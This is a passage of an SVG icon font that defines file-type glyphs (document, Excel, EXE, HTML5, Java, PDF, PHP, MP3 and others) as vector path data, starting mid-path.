m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-document" horiz-adv-x="1000" unicode="&#xeb0e;" d="M523 559h192v-46h-192v46z m0-76h192v-47h-192v47z m0-77h192v-46h-192v46z m-238 153h200v-200h-200v200z m0-228h430v-46h-430v46z m0-72v-47h430v48h-430v-1z m0-72h430v-46h-430v46z m557 663h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-eps" horiz-adv-x="1000" unicode="&#xeb0f;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-158 97c-27 50-76 85-132 95l34 15c7-7 19-9 29-5 6 3 12 8 14 15 3 6 3 13 0 20-6 13-22 19-35 13-11-4-17-14-17-24l-73-30c-5-1-10-1-15-2l-13 27-85-35 12-26c-6-4-12-9-17-14l-73-31c-8 7-19 9-29 5-14-6-20-21-14-34 6-13 23-20 36-14 9 4 16 14 16 24l33 14c-30-46-37-105-18-158l-23-10 37-82 85 36-37 82-28-12c-20 58-1 122 47 161l11-24 85 36-10 22c61 5 119-26 148-77l-28-12 37-82 85 35-37 83-25-11z" />
<glyph glyph-name="file-excel" horiz-adv-x="1000" unicode="&#xeb10;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-170 245h-104l-61-126-62 126h-104l105-187-108-191h105l64 128 63-128h105l-108 191 105 187z" />
<glyph glyph-name="file-exe" horiz-adv-x="1000" unicode="&#xeb11;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-295-21c-2 1-2 2-2 4 0 6 0 11 0 16 0 2 1 3 2 4 3 2 7 4 11 6 7 5 15 9 23 14-3 9-6 17-9 26-1 3-2 3-5 3-12-1-23-2-35-4-2 0-3 1-5 3-3 4-6 8-9 12-1 2-2 3-1 5 2 3 4 7 5 11 4 8 7 16 11 25-8 5-16 11-23 16-2 1-3 1-5-1l-27-23c-1-2-3-2-5-1-5 2-10 3-15 5-2 0-3 1-4 4-2 12-5 24-8 37h-31c-3-13-6-25-9-37 0-3-1-4-3-4-5-2-11-3-15-5-3-1-4 0-6 1-9 8-18 16-27 24 0 0-3 1-3 0-8-5-16-11-24-16 5-13 10-24 15-36 1-2 1-3 0-5-3-3-6-7-8-11-2-3-5-4-9-3-11 1-22 2-33 3-2 0-3-1-4-1-3-10-6-19-9-28 1-1 2-1 3-2 10-6 21-12 31-17 2-2 2-3 2-5 0-5 0-10 0-15 1-3 0-4-2-5-10-6-20-12-30-17-1-1-3-2-4-3 3-8 6-17 9-25 1-3 2-4 5-3 12 1 23 2 35 3 2 0 3 0 5-2 2-4 5-8 8-12 2-2 2-4 1-6-5-12-10-23-15-35 8-5 16-11 24-16 1-1 3 0 4 0 9 8 18 16 27 24 1 1 3 1 5 1 5-2 9-4 14-5 3-1 4-2 5-4 2-12 5-25 8-37h31c3 13 6 25 9 37 0 2 1 3 4 4 5 1 10 3 14 5 3 0 4 0 6-1 9-8 18-16 27-24 0-1 2-1 3-1 8 6 16 11 24 17-5 12-10 24-16 35-1 3 0 4 1 6 3 3 6 7 8 10 2 4 5 4 9 4 11-1 22-2 33-3 1 0 3 1 4 2 3 9 6 17 9 26-2 2-3 2-4 3-10 5-20 11-30 17z m-119-37c-27 1-49 24-48 50 1 28 24 49 53 48 26 0 48-24 48-50-1-28-24-49-53-48z m181 158c2-8 3-16 5-24h21c2 8 4 16 5 24 1 2 1 2 3 3 3 1 6 2 10 3 1 0 2 0 3-1 6-5 12-10 18-15 0-1 1-1 2-1 5 4 11 8 16 11-4 8-7 16-10 23-1 2-1 2 0 4 2 2 4 4 5 7 2 2 3 2 6 2 7-1 15-1 22-2 1 0 2 1 2 1 2 6 4 12 6 18-1 0-2 1-2 1-7 4-13 8-20 12-1 0-2 1-2 2 0 4 0 7 0 11 1 1 1 2 2 2 2 2 5 3 7 4 5 3 10 6 15 9-2 6-4 11-6 17 0 2-1 2-3 2-8-1-15-1-23-2-1 0-2 0-3 1-2 3-4 6-6 9-1 1-1 1 0 2 1 3 2 5 3 8 2 5 5 10 7 16-5 3-10 7-15 10-2 1-2 1-3 0l-18-15c-1-1-2-1-3-1-3 1-7 2-10 3-1 1-2 1-2 3-2 8-4 16-6 24h-20c-2-9-4-17-6-24 0-2-1-3-2-3-4-1-7-2-10-3-1 0-2 0-3 1-6 5-12 10-18 15-1 0-2 1-3 0-5-3-10-7-15-10 3-8 7-16 10-23 1-2 0-3 0-4-2-2-4-4-6-7-1-2-3-2-5-2-7 1-15 2-22 2-1 0-2 0-2-1-2-6-5-12-7-18 2 0 2-1 3-1l20-11c1-1 1-2 1-3 0-4 0-7 0-10 0-2 0-3-1-3-7-4-13-8-20-12-1 0-1-1-3-1 2-6 4-11 6-17 1-2 2-2 4-2 7 1 15 2 22 2 2 1 3 0 3-1 2-3 4-5 6-8 1-1 1-2 1-4-4-7-7-15-11-23 6-3 11-7 16-11 1 0 2 0 3 1 6 5 11 10 17 15 1 1 2 1 4 1 3-1 6-2 9-3 2-1 3-1 3-3z m-17 74c1 18 15 32 34 31 18 0 32-15 31-33 0-18-15-31-34-31-17 1-32 16-31 33z m126-183c2 1 4 2 5 3 4 2 7 4 11 6-1 4-3 8-4 11 0 2-1 2-3 2-5-1-10-1-15-2-1 0-2 0-3 1-1 2-2 4-4 6 0 1-1 1 0 2 1 2 1 3 2 5 2 4 3 7 5 11-4 3-7 5-11 8 0 1-1 0-2 0l-12-11c-1-1-1-1-2 0-2 0-5 1-7 2-1 0-1 0-2 1-1 6-2 12-3 17h-15c-1-5-2-11-4-17 0-1 0-1-1-1-3-1-5-2-7-2-1-1-2-1-3 0-4 4-8 7-12 11 0 0-1 0-1 0-4-3-8-5-11-8 2-5 4-10 7-16 0-1 0-1-1-2-1-2-2-3-3-5-1-2-2-2-4-2-5 1-10 1-15 2-1 0-2 0-2-1-1-4-3-8-4-12 1-1 1-1 1-1l14-8c1-1 1-1 1-2 0-3 0-5 0-7 1-1 0-2-1-2-4-3-9-6-13-8-1 0-1-1-2-1 1-4 3-8 4-12 0-1 1-1 2-1l16 1c1 0 2 0 2-1 2-2 3-3 4-5 1-1 1-2 1-3-3-5-5-10-7-16l11-7c0 0 1 0 1 0 4 4 9 7 13 11 0 0 1 1 2 0 2-1 4-1 7-2 1 0 1-1 2-2 1-5 2-11 3-17h15c1 6 2 12 3 17 1 1 1 2 2 2 2 1 5 1 7 2 1 1 2 0 2 0 4-4 8-7 13-11 0 0 1 0 1 0 4 2 7 5 11 7-2 6-5 11-7 17 0 1 0 1 0 2 2 2 3 3 4 5 1 2 2 2 4 1 5 0 10-1 15-1 1 0 1 0 2 1 1 4 2 8 4 12-1 1-1 1-2 1-4 3-9 6-13 8-1 1-2 1-2 2 1 2 0 5 1 7-1 1 0 1 0 2z m-54-28c-12 0-22 11-21 23 0 13 10 22 24 22 12-1 22-11 21-23 0-13-11-22-24-22z" />
<glyph glyph-name="file-file" horiz-adv-x="1000" unicode="&#xeb12;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-flv" horiz-adv-x="1000" unicode="&#xeb13;" d="M705 381v50c0 3-3 6-7 6h-263c-4 0-7 1-7 1 0 0 3 1 7 2 88 23 176 46 264 69 4 1 6 4 5 8-6 18-11 37-16 55-1 4-3 6-4 6-2 0-2-1-3-1-50-13-100-26-150-39l-233-60c-3-1-4-2-4-6 0-22 0-44 0-66v-32c0-82 0-163 0-245 0-4 3-7 7-7h398c3 0 7 3 7 7v238c0 4 0 7-1 7 0 0 0 3 0 7z m-107 160c19 5 38 10 57 15 4 1 7-1 9-5 2-9 5-18 7-28 1-3-1-7-5-8-7-2-14-4-21-5-9-3-17-5-25-7-2 0-4 0-5 1-7 10-13 20-20 30-2 3-1 6 3 7z m-99-26c7 2 14 4 21 6 8 2 16 4 25 6 1 0 4 0 5-1 6-10 13-20 20-30 2-3 1-6-3-7-14-4-29-8-43-11-4-1-8 0-11 4-5 8-12 17-17 26-3 3-1 6 3 7z m-154-106c-12 0-22 10-22 21 0 12 10 22 23 22 12 0 22-11 22-22-1-11-11-21-23-21z m48 78c0 0 3 1 7 2 15 4 31 8 46 12 2 0 4 0 4-1 7-10 14-19 21-29 2-4 1-7-3-8-9-2-17-4-26-7-7-1-14-3-21-5-1 0-4 0-4 1-8 11-16 23-24 34 0 0 0 0 0 1z m6-100l5 15c2 6 4 12 7 18 0 2 2 3 3 3 16 0 33 0 49 0 4 0 6-3 5-6-3-10-7-20-10-30-1-3-6-6-9-6h-45c-4 0-6 3-5 6z m151-140c-32-16-62-31-93-47-5-3-11 1-11 6v95c0 6 6 9 11 7 31-16 61-32 93-48 5-3 5-10 0-13z m22 173c-4-12-8-24-12-36-1-2-1-3-4-3-18 0-36 0-54 0-1 0-1 0-1 0-1 0 0 3 1 7 3 7 5 14 8 21 1 5 2 11 6 14 3 2 10 0 15 0h35c4 0 7 0 7-1-1-1-1-2-1-2z m104-32c0-4-3-7-7-7h-59c-4 0-6 3-5 6 4 10 7 20 10 30 2 3 6 6 10 6h44c4 0 7-3 7-7v-28z m166 462h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-gif" horiz-adv-x="1000" unicode="&#xeb14;" d="M706 211c-14 0-27 16-36 35 11 2 21 5 30 9-12 0-23 14-32 31 9 1 19 4 26 8-29 0-51 84-51 84s-25-84-50-84c7-3 15-6 25-8-1-1-2-3-3-5-21 2-42 30-60 63 19 4 38 9 52 15-20 0-39 25-56 56 17 3 33 7 45 13-45 0-90 150-90 150s-39-150-90-150c14-6 29-10 47-13-12-21-26-40-40-49-24 31-41 94-41 94s-33-111-66-111c9-5 20-7 32-10-12-23-27-41-41-41 11-5 24-9 39-11-14-26-30-47-46-47 18-8 42-13 67-15v-78c-56 17-74-13-74-25h405c-2 42-11 11-44 13v65c19 1 38 4 52 11z m-262 136c5-1 10-2 16-3-7-13-15-26-23-36-9 8-16 19-23 31 11 2 21 5 30 8z m43-201c-53-4-72 41-77-6-5-1-9-1-14-1v85c26 2 50 7 69 15-14 0-28 14-39 31 19-5 40-8 61-10l0-114z m145-5c-6 2-11 2-16 3-13 14-40 27-89 11v106c33 2 63 8 87 19-9-14-18-25-28-25 9-4 19-6 30-8-11-20-22-36-35-36 14-6 32-10 51-11v-59z m210 709h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-html5" horiz-adv-x="1000" unicode="&#xeb15;" d="M278 590c2-18 4-35 6-52 5-57 10-114 15-171 4-48 8-96 12-143 2-23 5-46 6-69 1-6 5-7 9-9 53-14 105-29 158-43 4-2 8-3 12-5h8c24 8 49 15 74 22 31 9 62 17 94 26 7 2 10 5 10 12 5 57 11 114 16 171 4 55 9 110 14 164 3 31 5 62 8 92 0 2 1 3 2 5v12h-444l0-12z m403-26c-2-19-3-37-5-55l-11-122c-4-49-9-97-13-145-2-18-4-37-5-55 0-6-2-10-8-12-45-12-89-24-134-36-3-1-7-1-11 0-44 12-88 24-132 36-7 2-9 6-9 12-4 39-7 79-11 118-4 49-8 98-13 147-3 37-6 74-10 112h362z m-113-223c-2-23-4-45-6-66-1-3-3-6-6-7-17-5-35-10-53-14-3-1-6-1-9 0-17 4-33 9-49 13-6 2-8 4-8 10-1 9-1 19-2 29-1 3-3 7-5 7-17 0-34 0-52 0 2-28 5-55 8-82 0-3 3-6 6-7 34-10 68-19 102-28 4-1 8-1 11 0 34 9 67 19 101 27 6 2 8 5 8 11 4 41 8 82 11 123 1 13 3 26 4 40h-202c-2 18-4 36-5 56h198c3 0 6-1 8 0 3 1 6 3 6 6 2 16 3 32 5 49h-279c5-56 10-111 15-168 65 1 128 1 193 1z m274 509h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-image" horiz-adv-x="1000" unicode="&#xeb16;" d="M549 337c18 0 32 14 33 32 0 18-14 33-32 34-19 0-34-15-34-34 0-18 15-32 33-32z m163 186c-12 1-25 0-39 0v37c0 14-2 16-16 16h-22c-9 0-13-4-13-13v-40h-277c-17 0-19-1-19-18v-277h-36c-14 0-16-3-17-17v-21c1-10 3-13 14-13 13-1 25 0 39 0v-39c0-11 3-14 14-14h24c9 0 14 4 14 13-1 13-1 26-1 40h278c17 0 18 1 18 18v277h37c13 0 16 3 16 17 1 7 1 13 0 21 0 11-3 13-14 13z m-91-286c-15 19-29 36-44 56-4 5-10 5-14-1-3-3-5-6-7-9-4-6-11-6-15-1-10 11-19 22-28 33-6 5-13 5-17 0-5-6-10-12-14-18-5-5-11-6-15-3-4 3-9 3-12 0-2-3-7-2-10 3-1 3-3 6-5 9-1 2-3 3-3 3-1-1-1-1-1-1-10-18-19-35-28-53-2-3-3-3-5-3-8 2-16 2-25 2v218h243l0-235z m221 613h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-iso" horiz-adv-x="1000" unicode="&#xeb17;" d="M500 569c-121 0-219-98-219-219s98-219 219-219c120 0 219 98 219 219s-99 219-219 219z m-1-309c-50 0-89 40-89 91 0 50 40 89 90 89 51 0 90-40 90-91-1-50-41-89-91-89z m1 152c-35 0-62-27-62-61 0-35 27-63 61-63 35 0 63 27 63 61 0 35-27 63-62 63z m342 438h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-java" horiz-adv-x="1000" unicode="&#xeb18;" d="M485 317l17-13-10 19c-1 0-32 61-31 105 0 15 22 32 45 50 20 17 44 36 58 58 30 48-4 96-4 97l-13 18 5-22c0 0 6-32-12-65-7-13-24-25-43-38-28-19-59-40-75-76-29-62 59-130 63-133z m-37-64c9 0 18 0 28 0 103 4 141 35 142 37l16 13-20-5c-24-7-63-10-100-12l14 9c2 2 46 32 38 69-3 14-10 25-16 34-10 14-17 24-6 43 12 22 68 63 68 64l27 20-31-12c-5-2-114-43-114-94 0-34 15-53 26-66 4-5 8-10 9-14 3-11-5-31-8-38l-8-15c-18-1-35-1-50-1-53 0-80 3-86 6 3 5 24 13 50 18l-1 9c-15 0-91-1-99-24-1-6-1-11 3-16 12-17 54-25 118-25z m224 73c-21 0-41-10-42-11l-17-9h19c1 0 46 0 50-25 4-22-42-58-61-69l-21-14 25 5c4 1 105 23 94 81-6 35-29 42-47 42z m-62-109l-35 24-2 0c0 0-25-7-62-11-14-2-31-2-47-2-37 0-61 4-64 7-1 1 0 1 0 2 0 1 4 3 6 4l-3 9c-24-5-36-13-35-23 2-18 44-28 79-30 6 0 11 0 17 0 59 0 135 18 136 18l10 2z m-174-28l-17 0c-3 0-32-2-34-19 0-6 1-10 5-15 10-12 37-19 84-22 6 0 11 0 17 0 59 0 99 18 100 19l8 4-39 24-2-1c0 0-20-4-49-8-5 0-12-1-20-1-30 0-62 5-68 8 0 1 0 1 1 2l14 9z m249-72c5 5 6 10 5 13-1 8-8 13-9 14l-28 18 22-25c0-1 2-3-1-6-6-5-62-20-157-25-13-1-26-1-40-1-87 0-149 12-154 17 1 5 24 12 48 16l-1 10c-1 0-3 0-5-1-39-2-83-7-85-26-1-6 1-12 5-16 10-12 40-27 178-27 136 0 208 24 222 39z m-60-39c-24-5-68-7-131-7-64 0-124 2-125 2l-1-9c1 0 64-15 150-15 42 0 82 3 120 10 72 12 76 47 77 49l1 14-9-11c-1 0-21-21-82-33z m217 772h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-javascript" horiz-adv-x="1000" unicode="&#xeb19;" d="M277 588c2-18 5-35 6-52 6-58 11-115 16-172 4-47 8-95 12-143 2-23 4-45 6-68 0-7 4-8 9-10 53-14 105-29 158-43 4-1 8-3 12-4h8c24 7 49 14 74 21 31 9 63 18 94 26 7 2 10 5 11 13 4 57 10 114 15 171 5 55 9 110 14 164 3 31 6 62 8 92 1 2 2 3 2 5v12h-445c0-4 0-8 0-12z m404-26c-2-19-3-37-5-55l-11-123c-4-48-8-96-13-145-1-18-3-36-4-55-1-6-2-10-9-11-44-12-89-25-133-37-4-1-8-1-12 0-44 12-88 25-132 36-7 2-9 6-9 12-4 40-7 79-11 119-4 49-9 97-13 146-3 38-6 75-10 113l362 0z m-132-311c-16-4-32-9-48-13-4-1-8-1-12 0-15 4-29 8-44 12-8 1-10 6-10 12 0 2 0 4 0 6-1 9-2 18-3 27h-52c0-6 0-12 1-18 1-19 4-38 5-56 0-8 3-10 9-12 32-8 64-17 95-26 4-1 9-1 13 0 15 4 30 8 45 12 19 6 38 11 58 17l14 164h-182c0 2-1 4-1 6 3 25 5 50 8 75 0 1 3 4 5 4 37 0 74-1 112-2 2-19 3-38 5-56h53c-3 38-6 76-10 114h-8c-66 0-131 0-197 0-7 0-8-3-9-9-1-18-3-35-4-53-2-19-4-39-6-58-1-14-2-28-4-41-1-11-1-22-2-33h182c-2-22-4-43-6-65 0-5-3-6-7-7z m293 599h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-jpg" horiz-adv-x="1000" unicode="&#xeb1a;" d="M575 406c43 1 76 33 76 75 0 44-34 79-77 80-43 0-79-37-77-81 1-41 35-74 78-74z m67-104c-9 12-25 12-35-1-5-9-10-16-15-23-9-14-25-15-36-3-23 27-45 52-67 77-11 12-29 12-39 0-11-14-22-27-32-40-11-13-27-17-36-9-9 7-22 7-27-1-7-8-17-4-24 7-4 7-8 14-12 20-4 7-7 10-9 8 0-1-1-2-1-3-14-26-27-52-41-78-8-15-17-31-24-46-3-6-12-56 5-69 61-1 133-1 203-1h1c150-1 291-1 291-1 16 1 21 11 11 24-38 47-73 92-113 139z m200 548h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-midi" horiz-adv-x="1000" unicode="&#xeb1b;" d="M275 124h449v452h-449v-452z m342 144h27v290h62v-416h-89v126z m-108 0h27v290h36v-289h26v-127h-89v126z m-108 0h27v290h35v-289h27v-127h-89v126z m-108 290h63v-289h26v-127h-89v416z m549 292h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-mov" horiz-adv-x="1000" unicode="&#xeb1c;" d="M369 264c51-19 104-21 157-9 46 10 87 30 117 67 31 37 39 79 18 124-14 30-37 51-65 67-41 24-86 34-140 34-19 1-43-3-68-9-42-12-79-32-108-66-34-42-36-95-6-139 23-34 56-56 95-69z m144 28c-13-14-31-19-50-20-19 1-36 5-50 19-15 15-15 36 1 51 24 24 75 23 99-1 14-15 14-34 0-49z m-66 106c0 6 7 11 16 11 8-1 15-5 15-11 0-7-7-12-16-12-8 1-15 6-15 12z m177 27c17-15 18-37 2-53-13-13-31-18-49-18-17 0-32 4-45 14-22 16-22 42 0 59 25 20 68 19 92-2z m-204 85c23 17 63 17 86-1 24-17 23-46-2-62-12-8-26-12-42-12-14 0-28 4-40 11-26 17-27 46-2 64z m-117-84c25 21 71 20 94-2 18-17 17-41-3-56-13-10-28-14-45-14-16 0-31 4-44 13-22 17-23 42-2 59z m432-150c-22 3-44 2-66-2-37-6-73-13-110-21-27-6-53-13-81-15-45-1-88 5-129 23-31 14-59 33-79 61-6 8-11 17-17 26 0-3 0-4 0-6 0-12 0-23 0-35-1-15 2-30 7-44 13-33 37-57 67-75 65-37 134-43 207-26 12 3 25 9 38 12 22 5 45 10 68 13 26 4 53 6 80 4 9 0 17-1 27-2v74c0 12 0 12-12 13z m-143-7c2-1 3-1 4 0 23 4 46 8 69 12 5 0 6 2 6 7 1 12 1 25 1 37 1 8 0 15 0 23-17-36-46-60-80-79z m250 581h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-mp3" horiz-adv-x="1000" unicode="&#xeb1d;" d="M713 248c1 15 1 30 2 45l3 59 2 48 2 59 2 35c0 16 1 32 2 48 0 4 0 9 1 13v2c0 1-1 0-1 1-2-1-5-1-7-1-18-2-37-3-56-5l-55-4-47-3-47-4-47-3-30-3c-2 0-2 0-2-2l-2-46c-1-15-1-29-2-43l-2-55-2-43-2-55c0-10 0-20-1-30 0-1 0-1-2-1-11 6-24 8-36 8-24-1-45-8-62-25-8-8-14-17-16-28 0-1 0-2-1-3v-10c1-3 2-7 3-10 3-12 11-21 21-28 12-8 26-13 41-13 0 0 1 0 1-1h7c1 1 1 1 2 1 4 0 9 0 13 1 19 4 35 13 47 27 7 8 12 18 13 29 1 8 1 16 2 24 0 13 1 26 1 40l2 52c1 13 2 27 2 40 1 19 2 39 3 58l1 34c0 2 1 2 2 2 7 1 14 2 22 3l26 2c11 1 21 2 32 3l27 3c10 1 21 2 32 3l26 3c11 1 21 2 32 3 9 1 18 2 27 3 2 0 3 0 3-2-1-10-2-20-2-30l-2-35c-1-12-1-23-2-34-1-12-1-24-2-36l-2-44c-1-5-1-10-1-15l-2 1c-11 6-23 9-35 9-7 0-15-1-22-2-20-4-36-13-48-29-13-16-16-35-6-54 6-12 16-19 28-25 14-7 29-9 44-7 18 2 34 8 48 19 9 8 16 16 19 27 3 8 3 16 3 24z m-414 63c6 1 10 6 8 12-1 6-6 9-12 8-7-1-14-3-21-6-15-7-26-19-30-34 0-3-1-6 0-8 5-11 17-9 20-1 6 17 17 27 35 29z m449-108c-8 1-11-3-13-10-3-15-12-24-26-28-13-4-18-16-5-22 2-1 6-1 8 0 4 2 7 3 10 5 18 8 30 21 33 41 2 7 0 13-7 14z m-378 92c-2 8-8 10-16 8-5-1-11-2-16-3-35-10-58-33-68-68-3-9 1-15 7-15 8 0 11 4 12 9 3 11 8 20 15 29 14 17 32 26 53 28 8 1 14 4 13 12z m472 555h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-pdf" horiz-adv-x="1000" unicode="&#xeb1e;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-94 1c-10 10-32 15-66 15h-4c-22 0-47-2-74-5-13 7-26 15-36 24-28 26-51 62-66 102 1 3 2 6 3 10 4 19 7 79 7 82l0 4c2 6 6 23 4 34 0 2-1 5-2 8l-3 7c-4 9-13 18-26 18l-7 0c-15 0-28-8-31-20-10-35 0-88 18-156l-4-11c-13-31-29-63-44-90l-1-3c-15-29-28-54-40-75l-13-6s-22-12-27-15c-44-26-72-55-77-79-2-10 1-18 8-23l12-6c6-2 11-4 17-4 31 0 67 39 116 124 57 19 121 34 177 42 43-24 96-41 129-41 6 0 12 1 16 2 6 1 12 6 16 11 2 4 4 13 5 18l0 22c-1 4-4 8-7 11z m-456-162c7 16 28 44 59 69 1 1 3 3 5 4-30-45-50-65-64-73z m191 437c0 2 0 3 1 5 2-3 5-8 10-17 4-10 4-22 4-32v-3c-1-6-7-27-10-41-5 22-8 42-8 60 0 5 1 18 3 28z m-55-309c6 12 13 24 20 36 17 33 28 58 36 80 17-30 37-55 61-75 2-2 5-4 8-6-48-10-89-21-125-35z m309 0c-1 0-4-1-9-1-17 0-45 7-74 19 32 3 55 1 69-3 17-5 19-10 19-9l0 0c-1-2-4-5-5-6z" />
<glyph glyph-name="file-php" horiz-adv-x="1000" unicode="&#xeb1f;" d="M500 480c-141 0-256-58-256-130 0-72 115-130 256-130 141 0 255 58 255 130 0 72-114 130-255 130z m-109-169c-10-1-20-1-30-1-6 0-9-1-10-8-1-8-3-16-5-24 0-2-3-5-5-5-8-1-16 0-26 0 9 47 18 93 27 140 10 0 20 0 30-1 12 0 24 1 36 0 31-3 44-21 39-51-5-28-27-48-56-50z m156-1h-30c4 19 7 37 11 54 4 23 2 26-21 26-19 0-19 0-23-18-4-21-8-41-12-62h-30l27 140h30c-2-13-4-24-7-37 3 0 6 0 8 0 11-1 21-1 32-1 23-2 32-14 28-36-3-18-6-35-10-52-1-4-2-9-3-14z m138 49c-5-27-28-47-55-48-11-1-22-1-33-1-5 0-7-2-7-6-2-9-4-18-6-26 0-2-3-5-5-5-8-1-16 0-25 0 4 24 8 46 13 69 4 22 8 43 12 65 1 4 3 6 7 6 20-1 39 0 59-1 33-2 46-21 40-53z m-46 30c-11 2-21 1-33 1-3-19-7-38-11-58h21c25 0 38 13 39 38 0 12-4 18-16 19z m-236 0c-11 2-21 1-31 1-2 0-4-1-4-3-4-18-7-36-11-55 8 0 15-1 21 0 25 0 37 11 39 39 0 11-4 16-14 18z m439 461h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
